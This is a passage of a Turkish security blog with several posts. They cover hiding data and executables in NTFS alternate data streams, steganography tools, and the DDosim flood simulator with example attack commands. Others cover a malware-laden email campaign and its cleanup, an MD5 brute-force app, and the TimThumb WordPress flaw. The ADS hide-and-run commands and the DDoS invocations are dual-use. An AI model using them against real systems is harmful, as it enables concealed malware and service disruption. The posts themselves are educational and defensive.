<li>Daha sonra dosyayı oluşturduğumuz C dizinine gidin, sadece deneme.txt’yi göreceksiniz. Klasör seçeneklerinden gizli dosyaları ve sistem korunan dosyalarını görünür hale getirin, dosya yine görünmeyecektir!</li>
</ul>
<ul>
<li>Ancak bu dosyayı ismini bilen bir kişi açabilir: <b>C:\notepad.exe deneme.txt:gizli.txt</b></li>
</ul>
Eveet şimdi bunu uygulamalı olarak videoya aldım bir de bu açıdan bakın:<br />
<object height="315" width="420"><param name="movie" value="http://www.youtube.com/v/TqnstN_c0Z0?hl=tr_TR&version=3&rel=0"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/TqnstN_c0Z0?hl=tr_TR&version=3&rel=0" type="application/x-shockwave-flash" width="420" height="315" allowscriptaccess="always" allowfullscreen="true"></embed></object><br />
<br />
<h4>
Bir Belge İçine Çalıştırılabilir Program Gizlemek</h4>
<ul>
<li><b>C:\Notepad.exe metin.txt</b></li>
</ul>
<ul>
<li><b>C:\type c:\hacker.exe > metin.txt:hacker.exe</b><br />(ADS olarak gizli programın metin.txt içine yerleştirilmesi)</li>
</ul>
<ul>
<li><b>C:\start c:\metin.txt:hacker.exe</b><br />(Gizlenmiş programı çalıştıracaktır)</li>
</ul>
<br />
<br />
<b>Peki sistemimde bu şekilde gizlenmiş veriler var mı?</b><br />
Öncelikle ADS NTFS dosya sisteminin bir özelliği olduğu için şüpheli dosyaları herhangi bir fat32 dosya sistemindeki diske taşırsanız dosya içinde bulunan gizli metin ya da dosyalar silinecektir. Elbette tüm dosyalarımızı taşımamız mümkün olmadığından bazı yazılımlara ihtiyacımız olacak.<br />
<h4>
ADS Tespit Edebilen Yazılımlar</h4>
<b>LNS</b><br />
Belirtilen dizin içindeki tüm dosyaları tarayabilen ADS tespit aracıdır. İçinde gizli veri olan dosyaları tespit edebilir, fakat gizli veriyi ayırma işlemini gerçekleştiremez.<br />
Detaylı bilgi http://ntsecurity.nu/toolbox/lns/<br />
<br />
<b>GMER</b><br />
Sistemimizde bulunan ADS ile gizlenmiş verileri tespit edebilir. Bunun yanında çalışan gizli programları servisleri ve rootkitlerin tespitinde kullanılabilir.<br />
Detaylı bilgi http://www.gmer.net/index.php<br />
<br />
<b>Visual ADS Detector</b><br />
Görsel olarak gizli veriyi tespit eden ve içeriğinin görüntülenmesini sağlayan yazılımdır. Aynı zamanda veri gizlemeyi de sağlar.<br />
Detaylı bilgi http://www.codeproject.com/KB/shell/csadsdetectorarticle.aspx<br />
<br />
<h3>
Steganography (Steganografi)</h3>
Steganografi, eski Yunanca’da ‘gizlenmiş yazı’ anlamına gelir ve bilgiyi gizleme (şifreleme değil) bilimine verilen isimdir. Çok kullanılan popüler bir veri saklama türü olan steganography, resim içine gizli veri saklamak için kullanılan bir tekniktir. Özellikle yasadışı örgütlerin gizli veri taşımak için çok kullandıkları bir yöntemdir. Resmin içine veri gizleyen kişi aynı zamanda içerikteki gizli veriyi şifreleyebilir.. Sadece parolayı bilen kişi dökümanı açabilir!<br />
<br />
<b>Resim dosyalarına veri saklama;</b><br />
<br />
- Resim dosyasında çıplak gözle anlaşılacak bir değişiklik olmaz<br />
- Boyut ve hash değişikliği<br />
- Özel yazılımlar kullanılarak saklanan veri şifrelenebilir<br />
- Veriyi geri getirmek için anahtar kullanılır<br />
- Anahtara yönelik brute-force saldırıları düzenlenebilir<br />
<h4>
Peki hangi programlar Steganography teknikleriyle veri gizleyebilir?</h4>
<b>ImageHide</b><br />
Resimlerin içine veri gizlemeyi sağlayan bir steganografi aracıdır. Şifreleme yapabilir, resim içindeki gizli veriyi sadece şfireyi bilen kişi açabilir. Resim görüntüsünde bozulma olmaz.<br />
Detaylı bilgi http://www.dancemammal.com<br />
<br />
<b>Online Steganography</b><br />
Detaylı bilgi http://kwebbel.net/stega/enindex.php<br />
<br />
<b>TinEye:Reverse Image Search</b><br />
Verilen bir resim dosyasının başka hangi sitelerde geçtiğini bulmaya yarar.<br />
Ayrıca Mozilla Firefox eklentisi de bulunmaktadır: https://addons.mozilla.org/en-US/firefox/addon/tineye-reverse-image-search/<br />
Detaylı bilgi http://www.tineye.com/<br />
<br />
<b>Mp3Stego</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB_r_gacKZyMnQwMWtcE351BLvmCPqbS8JRk9Ntnq-v_j3-HEEWmt1tEoceM8Z1KWzFAv7dNardQt9J3Q37EkRPEch2aKRXVaUFrcLkYK4KLpv14SCaE2yomT3cKacgTJLAPbOigUSEbT2/s1600/mp3Stego.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB_r_gacKZyMnQwMWtcE351BLvmCPqbS8JRk9Ntnq-v_j3-HEEWmt1tEoceM8Z1KWzFAv7dNardQt9J3Q37EkRPEch2aKRXVaUFrcLkYK4KLpv14SCaE2yomT3cKacgTJLAPbOigUSEbT2/s320/mp3Stego.jpg" width="320" /></a></div>
<br />
Mp3 dosyalarının içine veri gizlemeyi sağlayan araçtır. Mp3Stego içine veri gizleyeceği dosyayı wav dosyası olarak kabul eder ve veriyi gizledikten sonra formatı mp3′e dönüştürür.<br />
<br />
Detaylı bilgi http://www.petitcolas.net/fabien/steganography/mp3stego/<br />
<b><br /> </b><br />
<b>Stego Video</b><br />
Herhangi bir video dosyasının içine gizli veri saklayabilir. Gizli haberleşme için kullanılan programlardan biridir.<br />
Detaylı bilgi http://www.compression.ru/video/<br />
<br />
<b>Snow</b><br />
Çeşitli dosya türlerine veri gizleyebilen ufak bir yazılımdır. Veri tespit edilse bile sadece parolayı bilen kişi veri içeriğini görüntüleyebilir.<br />
<i>Kullanımı;</i><br />
<br />
<ul>
<li>C:\Snow.exe -C -m “gizli veri” -p “password” deneme.txt deneme2.txt<br />(Gizli veri metnini bir parola ile şifreleyerek ve deneme.txt’yi kullanarak deneme2.txt adlı gizli verinin olduğu dosyayı oluşturur)</li>
</ul>
<ul>
<li>C:\Snow.exe -C -p “password” deneme2.txt<br />(deneme2.txt içindeki gizli veriyi password şifresini kullanarak açar)</li>
</ul>
Detaylı bilgi http://www.jjtc.com/Security/stegtools.htm<br />
<h4>
Steganography Nasıl Tespit Edilir?</h4>
İnternet üzerinde steganography tespiti için pek çok araştırmanın bilgileri olsa da ciddi anlamda steganography’i tespit edip içindeki verileri çıkartabilen kesin sonuç verebilen yazılımlar mevcut değildir. Yine de kısıtlı da olsa steganography tespitinde kullanılan araçlardan bahsetmekte fayda var;<br />
<br />
- <b>Stegdetect</b> resim içerisindeki veriyi tespit etmek için kullanılan bir araçtır.<br />
<br />
- <b>Stegbreak</b> gizli verilerin şifrelerini kırmak için sözlük saldırısı yapabilen bir araçtır. Jsteg-shell, Jpeghide ve OutGuess ile gizlenmiş verileri için kullanılabilir.<br />
<br />
- <b>SIDS</b> (stego intrusion detection system) yine tespit amaçlı kullanılan bir yazılımdır.<br />
<br />
- Steganography konusunda en önemli ticari yazılımlar sunan firma <i>Wetstone</i> firmasıdır.<br />
Detaylı bilgi https://www.wetstonetech.com/<br />
<br />
<br />
İlginizi çekebilecek farklı bir konu yazmak istedim. Umarım ki öyle olmuştur ve fayda sağlamıştır.. Güvenli günler diliyorum…İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com7tag:blogger.com,1999:blog-925370819781376022.post-74442894526473783802013-02-04T09:51:00.000+02:002018-10-25T15:31:44.934+03:00DDoS Simülatörü: DDosim<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJAD-sDOIds274Sf6h3ntHUfIxbVa_A2FF2G6z9s5v2NVyDul7XESy927GXv7SvnR5a3geTdCJm1kDRzT692okbqkOPdskb-2efrzxr-1b9zGRZEg9xSV_XHAqkJR_-xlthOv5biqbvXKG/s1600/ddos-simulator.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJAD-sDOIds274Sf6h3ntHUfIxbVa_A2FF2G6z9s5v2NVyDul7XESy927GXv7SvnR5a3geTdCJm1kDRzT692okbqkOPdskb-2efrzxr-1b9zGRZEg9xSV_XHAqkJR_-xlthOv5biqbvXKG/s200/ddos-simulator.jpg" width="200" /></a></div>
Merhaba arkadaşlar. Bugünkü yazımızda sizlere bir ddos simülatörü olan DDosim programının özelliklerini, linux ortamında kurmayı ve çalıştırmayı konu aldım.<br />
<br />
DDosim, Layer 7 (Application) katmanı için bir ddos simülatörüdür.<br />
<br />
<br />
<b><a href="https://sourceforge.net/projects/ddosim/" target="_blank">Programı indirmek için tıklayınız</a></b><br />
<br />
<a name='more'></a><b>Temel özellikleri:</b><br />
- Geçerli HTTP istekleri<br />
- Geçersiz HTTP istekleri<br />
- SMTP DDoS<br />
- Rastgele TCP port bağlantısı<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6s4vGeJ2mnMFVXnuhrs5OuLTuXINe_dto59UfNjFzukY6h3RkqbGS-J3i2vshdNGL3XgV2YKz4PlUeQItJLYRqS7lwbq6ctMdhAGusDJG0wQUs8chYUHTaK5zB88LqK4h_h6jQ9kMldcJ/s1600/ddos_simulator-ddosim_topology.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6s4vGeJ2mnMFVXnuhrs5OuLTuXINe_dto59UfNjFzukY6h3RkqbGS-J3i2vshdNGL3XgV2YKz4PlUeQItJLYRqS7lwbq6ctMdhAGusDJG0wQUs8chYUHTaK5zB88LqK4h_h6jQ9kMldcJ/s320/ddos_simulator-ddosim_topology.png" width="320" /></a></div>
<br />
<h2>
<b><i><a href="http://yadi.sk/d/L_xyohGC2LZqh" target="_blank">DDosim videolu anlatım için tıklayınız</a></i></b></h2>
<br />
<blockquote class="tr_bq">
./ddosim<br />
-d IP Hedef IP adresi<br />
-p PORT Hedef port<br />
[-k NET] C sınıfı kaynak IP (örneğin 10.4.4.0)<br />
[-i IFNAME] Çıkış arabiriminin ismi<br />
[-c COUNT] Kurulmak istenen bağlantı sayısı<br />
[-w DELAY] SYN paketleri arasındaki gecikme (milisaniye)<br />
[-r TYPE] TCP 3 yollu el sıkışma. Saldırı tipleri: HTTP_VALID, HTTP_INVALID, SMTP_EHLO<br />
[-t NRTHREADS] Paket gönderirken kullanılacak iş parçacığı sayısı (varsayılan 1)<br />
[-v] Ayrıntılı mod (yavaş)<br />
[-h] Yardım</blockquote>
<br />
<br />
<b>Örnek kullanım parametreleri:</b><br />
<br />
1. Web sunucusuna rastgele IP adreslerinden gelen geçersiz HTTP 10 TCP bağlantısı kurma:<br />
<i>Komut:</i> <b>./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0</b><br />
<br />
2. SMTP sunucusuna kaynak olarak 10.4.4.0 ağından gelen sonsuz bağlantıların kurulması ve EHLO istekleri gönderme:<br />
<i>Komut:</i> <b>./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -c 0 -r SMTP_EHLO -i eth0</b><br />
<br />
3. Bir web sunucuya yüksek hızda sonsuz geçerli HTTP bağlantılar kurma:<br />
<i>Komut:</i> <b>./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0</b><br />
<br />
4. Bir POP3 sunucusuna yerel adresinden sonsuz TCP bağlantıları (Layer 7'ye gerek olmadan):<br />
<i>Komut:</i> <b>./ddosim -d 192.168.1.2 -p 110 -c 0 -i eth0</b>İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com1tag:blogger.com,1999:blog-925370819781376022.post-15353180596917585422012-12-30T23:09:00.004+02:002012-12-30T23:12:30.465+02:00Twitter.com'da "Kötü Amaçlı Yazılım Var!" UyarısıMerhaba arkadaşlar. Bir kaç arkadaşım söylemişti ve incelemem sonucu bende kanaat getirdim twitter.com da bazı profil sayfalarına girince Google Chrome site hakkında zararlı yazılım uyarısı veriyordu! :)<br />
Ekran görüntüsü:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZDiUTtRprCASEYXiBv3zRzQsYk2JAkHqoyY2fkW-mvCDH6KeuGIILuwT8z9PCaddCRg-TqM1Qavmqph5GG2sGJ11Yv_YZWY6DK76DFt-inkTmK2urH9j56282wQDie1Zb4fgoefCXf21Z/s1600/twitter-virus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZDiUTtRprCASEYXiBv3zRzQsYk2JAkHqoyY2fkW-mvCDH6KeuGIILuwT8z9PCaddCRg-TqM1Qavmqph5GG2sGJ11Yv_YZWY6DK76DFt-inkTmK2urH9j56282wQDie1Zb4fgoefCXf21Z/s320/twitter-virus.png" width="320" /></a></div>
<br />
Tabi bunun görürmez durur muyum? Durmam :) Hemen NoScript'le inceledim <b>twitpic</b> sitesinden kaynaklanıyor bu uyarı, bakınız: <a href="http://www.google.com.tr/search?q=twitpic&oq=twitpic&sugexp=chrome,mod=5&sourceid=chrome&ie=UTF-8">http://www.google.com.tr/search?q=twitpic&oq=twitpic&sugexp=chrome,mod=5&sourceid=chrome&ie=UTF-8</a><br />
<br />
Arama linkine girdiğinizde aşağıdaki görüntüyle karşılaşacaksınız (<b>Bu site bilgisayarınıza zarar verebilir</b>)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWA9XH8wVzYGLfMngHYusdf_xBMhjGC-aM05RtwvNUC4ZiBD28xCS6zeWF9a6CWfjsaebGSapWX4bb3KKT3b8MG45vEq0th-quWmnI_mCGsHm3n7fyGe9VGYSOnIsd4cM0XZUcJ_lWJ4Bd/s1600/twitpic-virus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWA9XH8wVzYGLfMngHYusdf_xBMhjGC-aM05RtwvNUC4ZiBD28xCS6zeWF9a6CWfjsaebGSapWX4bb3KKT3b8MG45vEq0th-quWmnI_mCGsHm3n7fyGe9VGYSOnIsd4cM0XZUcJ_lWJ4Bd/s320/twitpic-virus.png" width="320" /></a></div>
<br />
Şimdi "eee sonuç nedir?" diyeceksiniz. Hiiç öylesine paylaştım, soran arkadaşlara olayı aydınlatmak istedim :)<br />
<br />
Güvenli günler...İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com1tag:blogger.com,1999:blog-925370819781376022.post-72214302411098108382012-12-19T16:45:00.003+02:002018-10-25T15:40:40.104+03:00Turkcell ve Vodafone İsmini Kullanan Virüse DikkatMerhaba arkadaşlar. Birkaç arkadaşım ve birkaç müşterimin şikayeti üzerine yaptığım incelemede;<br />
son zamanlarda firmalara Turkcell ve Vodafone'dan yollanmış gibi görünen ve içerisinde virüs barındıran mailler gönderilmektedir. Turkcell'den gelen mail "<i><b>Fatura Bildirimi</b></i>" konu başlığı ile, Vodafone'dan gönderilen mail ise "<b><i>Vodafone MMS message</i></b>" başlığı ile gönderilmektedir. Ekli dosya içerisinde bulunan virüs 8000 portunu açarak, bulaştığı bilgisayarı "zombie" hale getirmektedir...<br />
<a name='more'></a><b style="color: red;">Analiz:</b><br />
<b>Exe içerisine scr uzantılı (ekran koruyucusu) bir dosya inject edilmiş. Exe'yi çalıştırınca scr çalışıyor. Bu dosya uzak bir bağlantı açmıyor. Yani trojan diyemeyiz. Scr uzantısı içerisinde zararlı kodlar var. Bu Windows shell kabuğunda bazı değişiklikler yapıp ufak çapta zarar veriyor. Ekran görüntüsü klasik moda geçiyor, regedite bir kaç kayıt atıyor hepsi bu.</b><br />
<b><br /></b>
<b>Bunun dışında, virüs 8000 portunu açıyor. Fakat şimdilik herhangi bir yer ile iletişime geçmiyor. Bu yüzden bu bir botnet virüsü denebilir. Bulaştığı bilgisayarı ilerleyen zamanlarda zombi bilgisayar haline çevirmek için hazırlanmış olabilir.</b><br />
<b><br /></b>
<b>Teknik detaylar resimdeki gibidir:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5zbnupPczh6GzSClgURcwLU-ZHFMr18PeRhF5twunAJ9RBNAX6al8TOepzgFOoBNVBpZ2nespyZ6_uITbj7OG2WSZ47-_5P-tvySZ_ZtxzTu-75tqlylWXh_gWN6VLfCBg6TYzwsaqJM0/s1600/VirusDetay3.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAS7OHPIHd-K9BYQHySOHR27T-QNfEx6TrjivAcZ4cslacp0Iu68k-UrN2hoA1jZKPn1_w2CYS2IIDla9IUvNhT3OdFDt2nQRNYFF_ynXmkP8Db6uQuskuSpHjsxmgokFT62QAQCW-bLvB/s1600/VirusDetay2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAS7OHPIHd-K9BYQHySOHR27T-QNfEx6TrjivAcZ4cslacp0Iu68k-UrN2hoA1jZKPn1_w2CYS2IIDla9IUvNhT3OdFDt2nQRNYFF_ynXmkP8Db6uQuskuSpHjsxmgokFT62QAQCW-bLvB/s320/VirusDetay2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5zbnupPczh6GzSClgURcwLU-ZHFMr18PeRhF5twunAJ9RBNAX6al8TOepzgFOoBNVBpZ2nespyZ6_uITbj7OG2WSZ47-_5P-tvySZ_ZtxzTu-75tqlylWXh_gWN6VLfCBg6TYzwsaqJM0/s1600/VirusDetay3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5zbnupPczh6GzSClgURcwLU-ZHFMr18PeRhF5twunAJ9RBNAX6al8TOepzgFOoBNVBpZ2nespyZ6_uITbj7OG2WSZ47-_5P-tvySZ_ZtxzTu-75tqlylWXh_gWN6VLfCBg6TYzwsaqJM0/s320/VirusDetay3.png" width="320" /></a></div>
<br />
<br />
<b>İlk çalıştırıldığı andan itibaren kendini XP ve türevleri için C:\Document and Settings\All Users klasörüne svchost.exe adında kopyalıyor ve Regedit'e kaydediyor. Aynı zamanda Msconfig'e de kaydediyor. Windows 7 ve türevi isletim sistemine sahip pc'ler için ise C:\Users\ klasörüne svchost.exe olarak kopyalıyor.</b><br />
<b><br /></b>
<b>Temizlemek için, ekteki resimde dosya yoluna bakarak virüsü temizleyin ve ardından ekteki dosyada belirtmiş olduğum regedit kaydını temizleyin.</b><br />
<b><br /></b>
<b>VEYA</b><br />
<b><br /></b>
<b></b><br />
<b>1) Başlat > Çalıştır > msconfig yazıp enter tuşuna basıyoruz.</b><br />
<b>Açılan pencerede Başlangıç sekmesine geçin. Ve orada kb00740283.exe yi buluyor ve karşısındaki tiki kaldırıyoruz. Ayrıca bilgisayar başlangıcında şüphelendiğiniz ve bilmediğiniz programlar var ise onların işaretini de kaldırın.</b><br />
<b><br /></b>
<b>2) Başlat > Çalıştır > regedit yazıp enter tuşuna basıyoruz. Ctrl + F tuş kombinasyonlarıyla arama penceresini çağırıyoruz. kb00740283.exe bunu arıyoruz ne varsa siliyoruz.</b><br />
<br />
<br />
Güvenli günler dilerim...İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com5tag:blogger.com,1999:blog-925370819781376022.post-15718861524620062642012-12-01T11:22:00.001+02:002018-10-25T15:41:32.998+03:00Md5 Cracker for AndroidBu android için yaptığımız uygulama, Brute Force ile md5 çözer. Kesin sonuç..<br />
<br />
Brute Force (deneme-yanılma) yöntemiyle bütün ascii karakterleri md5'in çözülmüş halini bulana kadar dener.<br />
Türkçe karakterleri de desteklemektedir.Yarıda kesildiğinde kaldığınız yerden devam etmektedir. Telefon açık kaldığı sürece de bulmaya devam eder. Bulamayacağı md5 yoktur! Yeter ki yeterince zaman olsun... :)<br />
<br />
NOT: Bir sonraki versiyonda program; çözme işlemine başlamadan önce vermiş olduğunuz md5'i daha önceden internette kırılmış mı kırılmamış mı diye araştırıp. eğer yoksa crack işlemine başlayacak şekilde update yapılacaktır.<br />
<br />
Ekran görüntüleri;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwlf-Tks9M45GjOB9Iyl1wCbMH3T8jjOjEIpnEFX41s_NjeuJlbc_aioaNp-18Zb-4AJe3CXKZU21qiEb5HdXANwIOWVHuCWBWDuCF-1mrhwxQ863lS1OF6s-hOwMTKsFcwgNJW7rZGPHF/s1600/md5cracker1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwlf-Tks9M45GjOB9Iyl1wCbMH3T8jjOjEIpnEFX41s_NjeuJlbc_aioaNp-18Zb-4AJe3CXKZU21qiEb5HdXANwIOWVHuCWBWDuCF-1mrhwxQ863lS1OF6s-hOwMTKsFcwgNJW7rZGPHF/s320/md5cracker1.jpg" width="180" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTVNb6qMvzymO5KqqNvdaq2Fi4VdIYQYV7P6E6dkDBjDsplho4UPpLQ2XzWwkK0CiBBJFcrYzB8Cx3haZsOtMBJtcaixIn3wAyMQSsIpbMOumhhtmPLUEnI2lyP4h4OFZMV7ACmxkxqVr3/s1600/md5cracker2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTVNb6qMvzymO5KqqNvdaq2Fi4VdIYQYV7P6E6dkDBjDsplho4UPpLQ2XzWwkK0CiBBJFcrYzB8Cx3haZsOtMBJtcaixIn3wAyMQSsIpbMOumhhtmPLUEnI2lyP4h4OFZMV7ACmxkxqVr3/s320/md5cracker2.jpg" width="180" /></a></div>
<br />
<a href="https://play.google.com/store/apps/details?id=com.md5v4.md5.cracker" target="_blank">Uygulamayı Google Play üzerinden indirmek için tıklayınız</a>İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com5tag:blogger.com,1999:blog-925370819781376022.post-65614992759285651872012-11-29T11:12:00.000+02:002013-04-15T14:56:49.814+03:00Wordpress Themes Timthumb Scan for AndroidBu android uygulaması vermiş olduğumuz Wordpress sitesinin temasında bulunan '<b>timthumb</b>' güvenlik açığını tarar.<br />
<br />
Hemen hemen her wordpress temasında olabilecek dir durumdur. Bulduğunda hangi dizinde hangi isimle bulduğunu size çıkarır.<br />
<br />
Önemli sitelerde bile bu güvenlik açığı bulunmaktadır. Program tamamen güvenlik amaçlıdır.<br />
Her wordpress sitesi sahibi kullanmalıdır.<br />
<br />
<br />
<b><span style="color: red;">Öncelikle nedir bu timthumb:</span></b><br />
Timthumb.php dosyası WordPress temalarında ve eklentilerinde çok yaygın olarak kullanılan ve resimleri boyutlandırmaya yarayan çok kullanışlı bir dosya. Zaten bu nedenle bu güvenlik açığı büyük tehdit oluşturuyor. Timthumb.php dosyasındaki bu açığı ortaya çıkaran kişi olan Mark Maunder blogunda bununla ilgili bir yazıya yer vermiş. Mark Maunder’ın yazısından da okuyabileceğiniz gibi bu açığı keşfetmesine blogunun hacklenmesi vesile olmuş. Bütün dosyalarının ve klasörlerinin yazma izinlerini doğru ayarlamasına rağmen hacker’ın nasıl yazma iznine eriştiğine bir anlam verememiş ve araştırmaya başlamış.<br />
<br />
<a name='more'></a><br />
<br />
Araştırmaları neticesinde temasının içinde bulunan timthumb.php dosyası içindeki şu kodlar dikkatini çekmiş: $allowedSites = array ( ‘flickr.com’, ‘picasa.com’, ‘blogger.com’, ‘wordpress.com’, ‘img.youtube.com’, ‘upload.wikimedia.org’, ‘photobucket.com’, );<br />
<br />
flickr, blogger ve wordpress.com gibi güvenilir sitelerden resim çekebilmek ve thumbnail oluşturabilmek için koyulmuş bu kod, yararlanmasını bilenler için büyük bir açık oluşturuyordu. Bu şekilde URL’sinde sözkonusu sitelerin adresi geçen herhangi bir siteden normalde yazma izni olmayan karşıdaki sunucuya dosya gönderilebiliyordu. Örneğin youtube.com.zararlisite.com/zararliscript.php gibi bir adresteki bir dosyayı timthumb.php dosyasındaki bu açık sayesinde açığın bulunduğu sunucuya göndermek mümkün oluyordu.<br />
<br />
<br />
<b><span style="color: red;">WordPress timthumb.php güvenlik açığı nasıl kapatılır?</span></b><br />
İşte, Mark Maunder kendi yaşadığı bu kötü tecrübeden sonra, herkese bu açığa karşı önlem alma fırsatı sunmak için blogundan duyurdu. Açığı kapatmak için yapılması gereken şey ise aslında çok basit. Öncelikle sitenizin dosyaları arasında ne kadar timthumb.php dosyası varsa hepsini bulmalısınız. Daha sonra da yukarıda izin verilen sitelerin tanımlandığı kodda site isimlerini kaldırmak yeterli.<br />
<br />
Kodun son hali şöyle olmalı:<br />
$allowedSites = array (); Bu şekilde dış sitelere yazma izni engellenmiş oluyor.<br />
<br />
<span style="color: red;"><b>timthumb.php dosyasını kullanan eklentiler hangileri?</b></span><br />
Websitedefender.com‘un araştırmalarına göre bu scripti kullanan eklentilerin listesi şöyle:<br />
<br />
portfolio-slideshow-pro wp-mobile-detector a-wp-mobile-detector shortcodes-ultimate igit-related-posts-with-thumb-images-after-posts dukapress verve-meta-boxes db-toolkit logo-management wp-marketplace islidex aio-shortcodes category-grid-view-gallery WPFanPro igit-posts-slider-widget wordpress-gallery-plugin cms-pack Premium_Gallery_Manager dp-thumbnail placid-slider nivo-slider photoria LaunchPressTheme kc-related-posts-by-category journalcrunch download-manager wordpress-thumbnail-slider sugar-slider optimizepress<br />
<br />
<b><span style="color: red;">Ayrıca yine aynı siteye göre bu açığın bulunduğu bilinen wordpress temalarının listesi şöyle: </span></b><br />
Minimo Polished Minimal nebula TheCorporation TheStyle TuaranBlog striking MyCuisine AskIt Webly Aggregate TheSource reviewit kelontongfree Mentor SimplePress journalcrunch ecobiz Magnificent timthumb.php Olympia kingsize Chameleon DelicateNews videozoom-v2.0-original videozoom Envisioned twicet u-design genoa OptimizePress Modest mocell ephoto Theme InReview lightpress hostme PersonalPress Cadca arras tiwinoo_v3 MyProduct sc4 InterPhaseTheme InStyle LightBright TheProfessional mnfst freshnews ArtSee Boutique eStore Avenue twentyten XSWordPressTheme adcents Nova MyPhoto eGallery Striking_Premium_Corporate default Lycus manifesto cold DynamiX tarnished Nyke linepress DJ adria zimex peano ElegantEstate delight kelontong-free duotive-three SobhanSoft_Theme PureType yamidoo_pro vulcan2.1 eGamer Wooden peritacion AmphionPro trinity dandelion_v2.6.3 Juggernautgrande juggernaut-theme BlackLabel_v1.1.2 Feather reviewit1 zinepress_v1.0.1 tribune photoria vilisya DailyNotes Basic minerva anthology_v1.4.2 ModestTheme purevision parquet framed-redux eceramica InterPhase epsilon Striking thedawn peava Newspro telegraph averin telegraph_v1.1 Memoir NewsPro CircloSquero vassal maxell 13Floor wpanniversary OnTheGo Glider mohannad-najjar222 mohannad-najjar2 arthemia tuufy7 photoframe beach-holiday blacklabel cadabrapress snapwire bizpress themesbangkoofree TOA D4 eNews vulcan overtime rockwell_v1.0 vicon wideo CherryTruffle mio rttheme13 Linepress DeepFocus advanced-newspaper202 OptimusPrime Quadro Lumin minima identity U-design.v1.1.2_hkz KP Petra services 13FloorTheme.php BD PolishedTheme 13FloorTheme kiwinho graphix jerestate centro corage Reporter TheTravelTheme XSBasico openhouse seosurfing1 bluebaboon Newspro-2.8.6 nd zoralime GrupoProbeta eBusiness purplex kitten-in-pink FashionHouse WhosWho Deviant Bold BusinessCard EarthlyTouch GrungeMag LightSource Simplism TidalForce Glow Influx StudioBlue jpmegaph redina tritone dandelion_v2.5 Bluesky ColdStone silveroak newspro GamesAwe caratinga.net SimplePressTheme MyResume MyApp theme bigcity dandelion_v2.6.1 chronicle cuizine thesis_18 advanced-newspaper_new Event wpbedouine rt_affinity_wp arry12 backup-TheStyle ExploreFeed zzzzzzzzz Bluemist Hermes cleartype_v1.0 polariswp Chameleon 1.6 sniper adena ariela FreshAndClean wp-creativix Gördüğünüz gibi liste uzayıp gidiyor.<br />
<br />
İlerleyen günlerde bu liste daha da uzayabilir. Bu nedenle sitenizin hacklenme riskini azaltmak istiyorsanız kullandığınız eklentileri ve temaları bu açık var mı diye taramalısınız. Bu haberi paylaşarak açıktan daha çok kişinin haberdar olmasını sağlayabilirsiniz.<br />
<br />
<br />
Şimdi bu zafiyet için yaptığımız android uygulamasına devam edelim..<br />
<br />
Ekran görüntüleri:<br />
<div class="separator" style="clear: both; text-align: center;">
